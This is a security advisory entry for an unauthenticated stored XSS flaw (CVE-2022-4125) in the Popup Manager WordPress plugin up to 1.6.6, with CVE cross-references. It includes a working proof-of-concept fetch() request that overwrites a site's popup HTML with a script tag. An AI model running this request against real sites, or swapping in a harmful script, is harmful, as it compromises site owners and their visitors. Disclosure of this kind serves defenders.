Lucene search
Lana CodesWPEX-ID:7862084A-2821-4EF1-8D01-C9C8B3F28B05HistoryNov 28, 2022 - 12:00 a.m.
Popup Manager <= 1.6.6 - Unauthenticated Stored XSS
2022-11-2800:00:00
Lana Codes
145
stored xss
unauthenticated
popup manager
security vulnerability
EPSS
0.001
Percentile
39.7%
The plugin does not have authorisation and CSRF check when creating/updating popups, and is missing sanitisation as well as escaping, which could allow unauthenticated attackers to create arbitrary popups and add Stored XSS payloads as well
fetch('/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=pm_save_data&form_action=update&form_id=1&form_name=vulnerability&form_data={"form_action":"undefined","popup_template":"text","popup_template_style":"","popup_location":"modal-popup","popup_timer":"0","popup_trigger":"timer","popup_entry_animation":"bounce","popup_exit_animation":"bounce","popup_title":"XSS","popup_disclaimer":"Try XSS","popup_text":"vulnerable"}&popup_html=<script>alert("XSS");</script>',
redirect: 'follow'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));
This exploit script replaces the html of popup #1 with a script tag.Related
cvelist
cvelist
CVE-2022-4125 Popup Manager <= 1.6.6 - Unauthenticated Stored XSS
2022-12-19 13:41:50
nvd
nvd
CVE-2022-4125
2022-12-19 14:15:12
prion
prion
Cross site request forgery (csrf)
2022-12-19 14:15:00
wpvulndb
wpvulndb
Popup Manager <= 1.6.6 - Unauthenticated Stored XSS
2022-11-28 00:00:00
cve
cve
CVE-2022-4125
2022-12-19 14:15:12